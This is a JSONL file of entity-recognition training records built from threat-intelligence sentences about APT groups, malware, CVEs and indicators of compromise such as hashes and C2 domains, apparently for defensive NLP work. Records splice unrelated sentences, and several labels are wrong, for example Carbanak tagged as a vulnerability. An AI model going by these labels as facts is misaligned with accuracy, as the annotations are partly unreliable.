OutExtra.exe is a signed legitimate application from Microsoft named finder.exe .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "FILEPATH: OutExtra.exe": [[89, 101]], "ORGANIZATION: Microsoft": [[142, 151]], "FILEPATH: finder.exe": [[158, 168]]}, "info": {"id": "cyberner_stix_train_004004", "source": "cyberner_stix_train"}} {"text": "The latter implements the entire spyware program . Charming kitten regularly target international media outlets with Persian-language services . This part takes 90% of the whole launcher code and includes over 11 , 000 modifications . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"THREAT_ACTOR: Charming kitten": [[51, 66]], "ORGANIZATION: media": [[98, 103]], "VULNERABILITY: CVE-2022 - 41080": [[248, 264]], "VULNERABILITY: CVE-2022 - 41040": [[339, 355]]}, "info": {"id": "cyberner_stix_train_004005", "source": "cyberner_stix_train"}} {"text": "Examples of file names that are used include : %Temp%\\happiness.txt , %Temp%\\xxxx.exe .", "spans": {"FILEPATH: %Temp%\\happiness.txt": [[47, 67]], "FILEPATH: %Temp%\\xxxx.exe": [[70, 85]]}, "info": {"id": "cyberner_stix_train_004006", "source": "cyberner_stix_train"}} {"text": "Based on dynamic and static analysis of the malware sample associated with the supservermgr.com domain however , we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings .", "spans": {"DOMAIN: supservermgr.com": [[79, 95]]}, "info": {"id": "cyberner_stix_train_004007", "source": "cyberner_stix_train"}} {"text": "Extract information on pictures from the Gallery . Remsec uses a Lua interpreter to run Lua modules which perform various functions . 
In particular , these campaigns appear to be related to attacks carried out by a group called MoleRATs ( aka , Gaza Cyber Gang , Moonlight ) , an Arabic-speaking , politically motivated group that has been operating in the Middle East since 2012 . One can only guess how they will be used .", "spans": {"TOOL: Remsec": [[51, 57]], "TOOL: Lua interpreter": [[65, 80]], "TOOL: Lua modules": [[88, 99]], "THREAT_ACTOR: MoleRATs": [[228, 236]], "THREAT_ACTOR: Gaza Cyber Gang": [[245, 260]], "THREAT_ACTOR: Moonlight": [[263, 272]]}, "info": {"id": "cyberner_stix_train_004008", "source": "cyberner_stix_train"}} {"text": "By performing a deep analysis of the malware , we were able to extract the unpacked JAR file mycode.jar and reveal some very interesting code . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea .", "spans": {"THREAT_ACTOR: actors": [[165, 171]], "TOOL: HyperBro backdoor": [[186, 203]], "THREAT_ACTOR: Emissary Panda": [[348, 362]], "THREAT_ACTOR: Honeybee": [[394, 402]]}, "info": {"id": "cyberner_stix_train_004009", "source": "cyberner_stix_train"}} {"text": "How did Gooligan emerge ? APT38 . the lowest bit of the negated value becoming 1 . On 24 February , a cyber - attack against Viasat began approximately 1 hour before Russia launched its major invasion of Ukraine .", "spans": {"MALWARE: Gooligan": [[8, 16]], "THREAT_ACTOR: APT38": [[26, 31]], "ORGANIZATION: Viasat": [[125, 131]]}, "info": {"id": "cyberner_stix_train_004010", "source": "cyberner_stix_train"}} {"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . 
LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": {"MALWARE: RTF files": [[52, 61]], "VULNERABILITY: CVE-2018-0798": [[82, 95]], "TOOL: Microsoft Office": [[202, 218]], "VULNERABILITY: CVE-2017-11882": [[235, 249]]}, "info": {"id": "cyberner_stix_train_004011", "source": "cyberner_stix_train"}} {"text": "Some of its main areas of interest include nuclear physics , computer science and instrumentation , robotics and engineering , and electrical engineering , among others .", "spans": {}, "info": {"id": "cyberner_stix_train_004012", "source": "cyberner_stix_train"}} {"text": "APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) .", "spans": {"THREAT_ACTOR: APT39": [[0, 5]], "ORGANIZATION: telecommunications sector": [[26, 51]], "ORGANIZATION: travel industry": [[87, 102]], "ORGANIZATION: IT firms": [[107, 115]], "ORGANIZATION: high-tech industry": [[140, 158]], "THREAT_ACTOR: RedOctober": [[176, 186]], "ORGANIZATION: Kaspersky Security Network": [[291, 317]], "ORGANIZATION: KSN": [[320, 323]]}, "info": {"id": "cyberner_stix_train_004013", "source": "cyberner_stix_train"}} {"text": "During one session , the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers , all of which were associated with Russian financial institutions . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests . Hash : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . 
HHS HC3 pointed out that some emails included a subject line Victim Organization Date Business Review and gave the user the impression they were opening a secure email from their organization .", "spans": {"THREAT_ACTOR: BlackOasis": [[222, 232]], "THREAT_ACTOR: group": [[297, 302]], "ORGANIZATION: geopolitical": [[334, 346]], "FILEPATH: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[366, 430]], "ORGANIZATION: HHS HC3": [[433, 440]]}, "info": {"id": "cyberner_stix_train_004014", "source": "cyberner_stix_train"}} {"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Development of Bemstour has continued into 2019 .", "spans": {"THREAT_ACTOR: SLUB": [[4, 8]], "VULNERABILITY: CVE-2018-8174": [[99, 112]], "VULNERABILITY: CVE-2019-0752": [[116, 129]], "FILEPATH: Bemstour": [[147, 155]]}, "info": {"id": "cyberner_stix_train_004015", "source": "cyberner_stix_train"}} {"text": "‘ SimBad ’ has capabilities that can be divided into three groups – Show Ads , Phishing , and Exposure to other applications . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": {"MALWARE: SimBad": [[2, 8]], "TOOL: Remote Desktop Protocol": [[184, 207]], "TOOL: RDP": [[210, 213]], "VULNERABILITY: Carbanak": [[218, 226]], "ORGANIZATION: government": [[321, 331]], "ORGANIZATION: technology related companies": [[335, 363]]}, "info": {"id": "cyberner_stix_train_004016", "source": "cyberner_stix_train"}} {"text": "It ’ s been SophosLabs ’ observation that Red Alert Trojans usually have a randomized internal name like this . 
APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . is a RAT program used by APT10 and observed in Japan uniquely . This is a form of cyber attack used to gain an advantage over a competing organization .", "spans": {"MALWARE: Red Alert Trojans": [[42, 59]], "THREAT_ACTOR: APT38": [[112, 117]], "THREAT_ACTOR: regime-backed group": [[158, 177]], "ORGANIZATION: financial institutions": [[233, 255]], "THREAT_ACTOR: APT10": [[314, 319]]}, "info": {"id": "cyberner_stix_train_004017", "source": "cyberner_stix_train"}} {"text": "According to several timestamps , this payload is used by implant versions created since 2016 . COCCOC is a Vietnam was founded in 2013 . Due to overlapping TTPs , including similar custom tools , Moafee is thought to have a direct or indirect relationship with the threat group DragonOK .", "spans": {"THREAT_ACTOR: COCCOC": [[96, 102]], "THREAT_ACTOR: Moafee": [[197, 203]], "THREAT_ACTOR: group DragonOK": [[273, 287]]}, "info": {"id": "cyberner_stix_train_004018", "source": "cyberner_stix_train"}} {"text": "Starting in February 2018 , Palo Alto identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States . 
Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": {"ORGANIZATION: Palo Alto": [[28, 37]], "THREAT_ACTOR: Gorgon Group": [[95, 107]], "ORGANIZATION: governmental organizations": [[118, 144]], "TOOL: emails": [[226, 232]], "VULNERABILITY: exploit": [[275, 282]], "VULNERABILITY: CVE-2017-11882": [[291, 305]], "VULNERABILITY: vulnerability": [[306, 319]]}, "info": {"id": "cyberner_stix_train_004019", "source": "cyberner_stix_train"}} {"text": "Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": {"ORGANIZATION: Dragos": [[0, 6]]}, "info": {"id": "cyberner_stix_train_004020", "source": "cyberner_stix_train"}} {"text": "New FakeSpy campaign applications leveraging fake postal services apps . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out .", "spans": {"MALWARE: FakeSpy": [[4, 11]], "ORGANIZATION: Nasr Institute": [[130, 144]], "THREAT_ACTOR: Group": [[165, 170]], "THREAT_ACTOR: APT33": [[232, 237]], "THREAT_ACTOR: APT35": [[240, 245]], "THREAT_ACTOR: MUDDYWATER": [[252, 262]], "THREAT_ACTOR: GCMAN group": [[366, 377]], "ORGANIZATION: bank": [[444, 448]]}, "info": {"id": "cyberner_stix_train_004021", "source": "cyberner_stix_train"}} {"text": "If it does , it will commence with the billing process . That said , the \" fingerprints \" left on the samples by the attackers – including techniques used to achieve unauthorized code execution – suggest that the BARIUM APT is behind the effort , according to the researchers . 
The ZxShell hook code knows that and intercept it . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"THREAT_ACTOR: BARIUM APT": [[213, 223]], "MALWARE: ZxShell": [[282, 289]], "ORGANIZATION: CrowdStrike Services": [[368, 388]], "THREAT_ACTOR: Play ransomware intrusions": [[417, 443]], "TOOL: Microsoft Exchange": [[494, 512]]}, "info": {"id": "cyberner_stix_train_004022", "source": "cyberner_stix_train"}} {"text": "If the user long-presses the icon , the name of the app responsible for the activity is revealed ( right ) . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": {"MALWARE: RTF attachments": [[153, 168]], "VULNERABILITY: CVE-2017-0199": [[233, 246]], "TOOL: CWS": [[249, 252]], "TOOL: WSA": [[256, 259]]}, "info": {"id": "cyberner_stix_train_004023", "source": "cyberner_stix_train"}} {"text": "From mTAN to pushTAN In the past few years , some banks in Europe , especially in Germany , stopped using SMS-based authentication and switched to dedicated pushTAN applications for 2FA schemes . Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . APT34 uses a mix of public and non-public tools and often uses compromised accounts to conduct spear-phishing operations .", "spans": {"ORGANIZATION: Mandiant": [[196, 204]], "THREAT_ACTOR: APT32": [[230, 235]], "THREAT_ACTOR: APT34": [[323, 328]]}, "info": {"id": "cyberner_stix_train_004024", "source": "cyberner_stix_train"}} {"text": "If it is the first execution , and if the app ’ s path does not contain “ /system/app ” ( i.e . 
Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": {"THREAT_ACTOR: APT41": [[105, 110]], "ORGANIZATION: parent company": [[134, 148]], "THREAT_ACTOR: APT28": [[305, 310]]}, "info": {"id": "cyberner_stix_train_004025", "source": "cyberner_stix_train"}} {"text": "However , they have started changing their macOS malware .", "spans": {"SYSTEM: macOS": [[43, 48]]}, "info": {"id": "cyberner_stix_train_004026", "source": "cyberner_stix_train"}} {"text": "Of course , this does not mean the digital signature of the software developer can be used . TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks . This version embeds the 17 modules listed in the following table : An attacker could place HTML containing executable JavaScript inside element attributes .", "spans": {"ORGANIZATION: TAA": [[93, 96]], "ORGANIZATION: Symantec": [[180, 188]], "VULNERABILITY: An attacker could place HTML containing executable JavaScript inside element attributes": [[343, 430]]}, "info": {"id": "cyberner_stix_train_004027", "source": "cyberner_stix_train"}} {"text": "The malware also sends regular telemetry back to its C2 server about the infected device in the form of an HTTP POST to its C2 server . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 . but the introduced IDA Pro plugin HexRaysDeob didn’t work for one of the obfuscated ANEL samples because the tool was made for another variant of the obfuscation . 
Mandiant observed log entries in jcagent.log that indicated a directive named “ Runworkflow ” triggered execution on the system :", "spans": {"THREAT_ACTOR: APT38": [[136, 141]], "ORGANIZATION: banks": [[188, 193]], "ORGANIZATION: financial entities": [[198, 216]], "TOOL: IDA Pro": [[258, 265]], "TOOL: HexRaysDeob": [[273, 284]], "MALWARE: ANEL": [[323, 327]]}, "info": {"id": "cyberner_stix_train_004028", "source": "cyberner_stix_train"}} {"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe .", "spans": {"VULNERABILITY: CVE-2012-0158": [[23, 36]], "FILEPATH: Mimikatz Lite": [[227, 240]], "FILEPATH: GetPassword.exe": [[244, 259]]}, "info": {"id": "cyberner_stix_train_004029", "source": "cyberner_stix_train"}} {"text": "The proliferation of Android devices – from smartphones to tablets and smart TVs – has opened up new possibilities for malware developers , as all these devices pack microphones , cameras and location-tracking hardware they can turn into the perfect spy tools . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . 
To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": {"MALWARE: Android": [[21, 28]], "THREAT_ACTOR: SectorJ04": [[262, 271]], "ORGANIZATION: financial": [[319, 328]], "MALWARE: Remote Desktop Protocol": [[454, 477]], "MALWARE: RDP": [[480, 483]], "MALWARE: Carbanak": [[488, 496]]}, "info": {"id": "cyberner_stix_train_004030", "source": "cyberner_stix_train"}} {"text": "Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT Maudi Surveillance Operation which was previously reported in 2013 . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "VULNERABILITY: CVE-2018-0798": [[54, 67]], "THREAT_ACTOR: Maudi": [[145, 150]], "THREAT_ACTOR: Bahamut": [[244, 251]]}, "info": {"id": "cyberner_stix_train_004031", "source": "cyberner_stix_train"}} {"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . That changed on Jan. 
25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date .", "spans": {"THREAT_ACTOR: APT32": [[45, 50]], "ORGANIZATION: FireEye": [[66, 73]], "ORGANIZATION: business": [[135, 143]], "ORGANIZATION: security firm": [[229, 242]], "ORGANIZATION: CrowdStrike": [[243, 254]]}, "info": {"id": "cyberner_stix_train_004032", "source": "cyberner_stix_train"}} {"text": "While they have been quiet since our June analysis , we observed an increase in the group ’s activities in December , with updates on the kits ’ capabilities reminiscent of their previous attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_004033", "source": "cyberner_stix_train"}} {"text": "Tricky Configurations TrickMo uses the shared preferences mechanism to store settings and data that the malware uses at runtime . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": {"MALWARE: TrickMo": [[22, 29]], "MALWARE: Pony": [[178, 182]], "MALWARE: Vawtrak": [[187, 194]], "THREAT_ACTOR: OilRig": [[275, 281]], "THREAT_ACTOR: OilRig attack": [[415, 428]], "ORGANIZATION: government": [[454, 464]], "FILEPATH: N56.15.doc": [[467, 477]], "FILEPATH: 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00": [[480, 544]]}, "info": {"id": "cyberner_stix_train_004034", "source": "cyberner_stix_train"}} {"text": "One such email that we were able to obtain was targeting users in Turkey , as shown in Figure 4:Figure 4: Sample spear phishing email containing macro-based document attachment The 
malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey , Pakistan , Tajikistan and India . This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat .", "spans": {"TOOL: attachments": [[208, 219]], "FILEPATH: Ploutus-D": [[437, 446]], "ORGANIZATION: financial": [[464, 473]]}, "info": {"id": "cyberner_stix_train_004035", "source": "cyberner_stix_train"}} {"text": "Map of potential targets Early samples of FrozenCell used an online service for storing geolocation information of infected devices . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 exposé on Hidden Lynx . As covered in the previous “ Attack Lifecycle ” section , WEBC2 backdoor variants download and interpret data stored between tags in HTML pages as commands . 
When they pay for someone else ’s malware kit , whether it be ransomware or a phishing bot , they do n’t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": {"MALWARE: FrozenCell": [[42, 52]], "THREAT_ACTOR: Hidden Lynx": [[305, 316]], "MALWARE: WEBC2 backdoor": [[377, 391]], "TOOL: HTML": [[452, 456]]}, "info": {"id": "cyberner_stix_train_004036", "source": "cyberner_stix_train"}} {"text": "These dumpers create log files indicating the presence or absence of potential databases to dump :", "spans": {}, "info": {"id": "cyberner_stix_train_004037", "source": "cyberner_stix_train"}} {"text": "While ESET telemetry data indicates that this URL was delivered by spearphishing emails , we don’t have a sample of such an email .", "spans": {"ORGANIZATION: ESET": [[6, 10]], "TOOL: emails": [[81, 87]], "TOOL: email": [[124, 129]]}, "info": {"id": "cyberner_stix_train_004038", "source": "cyberner_stix_train"}} {"text": "The Trojan intercepts incoming SMSs and can receive the following commands from them : “ 3458 ” — revoke device administrator privileges from the app ; “ hi ” , “ ask ” — enable and disable mobile internet ; “ privet ” , “ ru ” — enable and disable Wi-Fi ; “ check ” — send text “ install : [ device IMEI ] ” to phone number from which SMS was sent ; “ stop_blocker ” — stop displaying all blocking HTML pages ; “ 393838 ” — change C & C address to that specified in the Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network . 
Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East .", "spans": {"MALWARE: Infostealer.Catchamas": [[552, 573]], "THREAT_ACTOR: Leafminer": [[620, 629]]}, "info": {"id": "cyberner_stix_train_004039", "source": "cyberner_stix_train"}} {"text": "TeamViewer has also been used in the \" Sheldor \" attack campaign , which was detected between 2010 and 2011 , and which resulted in assets stolen at the value of $600k and $832k . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"TOOL: TeamViewer": [[0, 10]], "THREAT_ACTOR: PLATINUM": [[180, 188]], "ORGANIZATION: specific individuals": [[262, 282]], "VULNERABILITY: zero-day": [[323, 331]]}, "info": {"id": "cyberner_stix_train_004040", "source": "cyberner_stix_train"}} {"text": "TA505 operates a variety of C&C servers , allowing it to be resilient in the case of takedowns , sinkholes , and other defensive operations .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "TOOL: C&C": [[28, 31]]}, "info": {"id": "cyberner_stix_train_004041", "source": "cyberner_stix_train"}} {"text": "At the time this malware was reported by several security vendors , and attributed to different malware families like Ghostpush , MonkeyTest , and Xinyinhe . APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy . OR by -2 ( 0xFFFFFFFE ) But as a new documentary series on Hulu reveals [ SPOILER ALERT ! 
] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": {"MALWARE: Ghostpush": [[118, 127]], "MALWARE: MonkeyTest": [[130, 140]], "MALWARE: Xinyinhe": [[147, 155]], "THREAT_ACTOR: APT38": [[158, 163]], "ORGANIZATION: financial institutions": [[180, 202]], "ORGANIZATION: Hulu": [[367, 371]]}, "info": {"id": "cyberner_stix_train_004042", "source": "cyberner_stix_train"}} {"text": "module for submitting all exfiltrated data to the server . With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . Lotus Blossom : DRAGONFISH , Spring Dragon .", "spans": {"MALWARE: SWAnalytics": [[83, 94]], "THREAT_ACTOR: Lotus Blossom": [[207, 220]], "THREAT_ACTOR: DRAGONFISH": [[223, 233]], "THREAT_ACTOR: Spring Dragon": [[236, 249]]}, "info": {"id": "cyberner_stix_train_004043", "source": "cyberner_stix_train"}} {"text": "Mobile ViceLeaker The following table shows meta information on the observed samples , including compiler timestamps : MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28 [ . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . In order to evade network level detection , the downloader uses steganography .", "spans": {"MALWARE: ViceLeaker": [[7, 17]], "MALWARE: Bisonal malware": [[261, 276]], "TOOL: downloader": [[382, 392]]}, "info": {"id": "cyberner_stix_train_004044", "source": "cyberner_stix_train"}} {"text": "spear phishing : analytics-google.org : 69/checkFile.aspx .", "spans": {"URL: analytics-google.org : 69/checkFile.aspx": [[17, 57]]}, "info": {"id": "cyberner_stix_train_004045", "source": "cyberner_stix_train"}} {"text": "Trend of the year : mobile banking Trojans 2013 was marked by a rapid rise in the number of Android banking Trojans . 
TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others . The path to wmplayer.exe is provided by the Config module . Additionally , Mandiant has observed the use of the SoftPerfect network scanner ( netscan.exe ) to perform internal network enumeration .", "spans": {"SYSTEM: Android": [[92, 99]], "TOOL: TClient": [[118, 125]], "FILEPATH: wmplayer.exe": [[230, 242]], "TOOL: SoftPerfect network scanner ( netscan.exe )": [[330, 373]]}, "info": {"id": "cyberner_stix_train_004046", "source": "cyberner_stix_train"}} {"text": "Use of legitimate site ( Pastebin ) to host malicious code ( to bypass security monitoring ) .", "spans": {"TOOL: Pastebin": [[25, 33]]}, "info": {"id": "cyberner_stix_train_004047", "source": "cyberner_stix_train"}} {"text": "In theory , the additional modules can do virtually anything on the victim system .", "spans": {}, "info": {"id": "cyberner_stix_train_004048", "source": "cyberner_stix_train"}} {"text": "They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . 
The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"ORGANIZATION: financial": [[53, 62]], "ORGANIZATION: economic": [[65, 73]], "ORGANIZATION: trade policy": [[78, 90]], "TOOL: publicly available RATs": [[109, 132]], "TOOL: Poison Ivy": [[141, 151]], "TOOL: non-public backdoors": [[167, 187]], "MALWARE: Trojan.Naid": [[296, 307]], "FILEPATH: Backdoor.Moudoor": [[310, 326]], "MALWARE: Backdoor.Hikit": [[333, 347]]}, "info": {"id": "cyberner_stix_train_004049", "source": "cyberner_stix_train"}} {"text": "Downeks makes a POST request to dw.downloadtesting.com , resulting in the installation of the Quasar RAT on the victim machine .", "spans": {"MALWARE: Downeks": [[0, 7]], "DOMAIN: dw.downloadtesting.com": [[32, 54]], "MALWARE: Quasar": [[94, 100]], "TOOL: RAT": [[101, 104]]}, "info": {"id": "cyberner_stix_train_004050", "source": "cyberner_stix_train"}} {"text": "Configure network logs to provide adequate information to assist in quickly developing an accurate determination of a security incident .", "spans": {}, "info": {"id": "cyberner_stix_train_004051", "source": "cyberner_stix_train"}} {"text": "This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[220, 227]], "MALWARE: TRITON": [[260, 266]], "ORGANIZATION: research institution": [[318, 338]], "THREAT_ACTOR: TEMP.Veles": [[364, 374]]}, "info": {"id": "cyberner_stix_train_004052", "source": "cyberner_stix_train"}} {"text": "from only one misconfigured command and control server ( out of over 37 servers ) . 
By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . APT1 maintains an extensive infrastructure of computers around the world . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": {"TOOL: GozNym": [[106, 112]], "ORGANIZATION: banks": [[156, 161]], "ORGANIZATION: community banks": [[253, 268]], "ORGANIZATION: email service providers": [[273, 296]], "THREAT_ACTOR: APT1": [[331, 335]], "THREAT_ACTOR: threat actors": [[419, 432]], "TOOL: a suite of malware tools": [[440, 464]]}, "info": {"id": "cyberner_stix_train_004053", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817469 [ . As of early 2019 , the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure . Release_Time : unknow Report_URL : https://attack.mitre.org/groups/ APT19 : Codoso , C0d0so0 , Codoso Team , Sunshop Group .", "spans": {"THREAT_ACTOR: threat vector": [[125, 138]], "THREAT_ACTOR: APT19": [[266, 271]], "THREAT_ACTOR: Codoso": [[274, 280]], "THREAT_ACTOR: C0d0so0": [[283, 290]], "THREAT_ACTOR: Codoso Team": [[293, 304]], "THREAT_ACTOR: Sunshop Group": [[307, 320]]}, "info": {"id": "cyberner_stix_train_004054", "source": "cyberner_stix_train"}} {"text": "Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . 
Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": {"TOOL: Poison Ivy": [[0, 10]], "TOOL: RATs": [[58, 62]], "MALWARE: Bookworm": [[221, 229]], "TOOL: C2": [[286, 288]], "MALWARE: FFRAT": [[338, 343]], "MALWARE: Poison Ivy": [[346, 356]], "MALWARE: PlugX": [[359, 364]]}, "info": {"id": "cyberner_stix_train_004055", "source": "cyberner_stix_train"}} {"text": "The stolen data is sent to the C2 server using the URL ending with /servlet/xx . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week .", "spans": {"MALWARE: PYTHON33.dll": [[126, 138]], "MALWARE: inicore_v2.3.30.dll": [[151, 170]], "TOOL: SysUpdate": [[287, 296]], "THREAT_ACTOR: Emissary Panda": [[316, 330]], "ORGANIZATION: FireEye": [[342, 349]], "TOOL: command-and-control": [[389, 408]], "TOOL: CnC": [[411, 414]], "THREAT_ACTOR: Ke3chang actor": [[441, 455]]}, "info": {"id": "cyberner_stix_train_004056", "source": "cyberner_stix_train"}} {"text": "This file is decrypted and injected into an instance of InstallUtiil.exe , and functions as a Tor anonymizer . 
In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": {"MALWARE: InstallUtiil.exe": [[56, 72]], "MALWARE: Tor": [[94, 97]], "MALWARE: anonymizer": [[98, 108]], "ORGANIZATION: US-CERT Code Analysis Team": [[161, 187]], "FILEPATH: botnet controller": [[197, 214]]}, "info": {"id": "cyberner_stix_train_004057", "source": "cyberner_stix_train"}} {"text": "Cobalt Strike appears to be one of BRONZE PRESIDENT 's preferred remote access tools .", "spans": {"TOOL: Cobalt Strike": [[0, 13]], "THREAT_ACTOR: BRONZE PRESIDENT": [[35, 51]]}, "info": {"id": "cyberner_stix_train_004058", "source": "cyberner_stix_train"}} {"text": "] 204 [ . Komplex shares a significant amount of functionality and traits with another tool used by Sofacy – the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows . It is clear that the text is a base64 encoded command , that is then executed by the above VBScript . Mandiant has observed an increase in financially motivated operations by DPRK actors in the past year , particularly those focused on the cryptocurrency industry .", "spans": {"TOOL: Komplex": [[10, 17]], "THREAT_ACTOR: Sofacy": [[100, 106], [134, 140]], "TOOL: Carberp": [[113, 120]], "TOOL: VBScript": [[299, 307]], "THREAT_ACTOR: DPRK actors": [[383, 394]]}, "info": {"id": "cyberner_stix_train_004059", "source": "cyberner_stix_train"}} {"text": "It requests permission to access the additional storage . Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon . and the destination of goto jump instruction are updated . 
Symantec has identified MuddyWater as responsible for a new cyberespionage campaign targeting telecommunication and IT service providers in Asia and the Middle East for over six months .", "spans": {"THREAT_ACTOR: Gamaredon": [[185, 194]], "ORGANIZATION: Symantec": [[256, 264]], "THREAT_ACTOR: MuddyWater": [[280, 290]], "ORGANIZATION: telecommunication and IT service providers": [[350, 392]]}, "info": {"id": "cyberner_stix_train_004060", "source": "cyberner_stix_train"}} {"text": "Otherwise , in the case of conditional opcodes , the variable part can contain the next JIT packet ID or the next relative virtual address ( RVA ) where code execution should continue . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware . Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba https://bugcheck.xigncodeservice.com/Common/Lib/common.php . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA 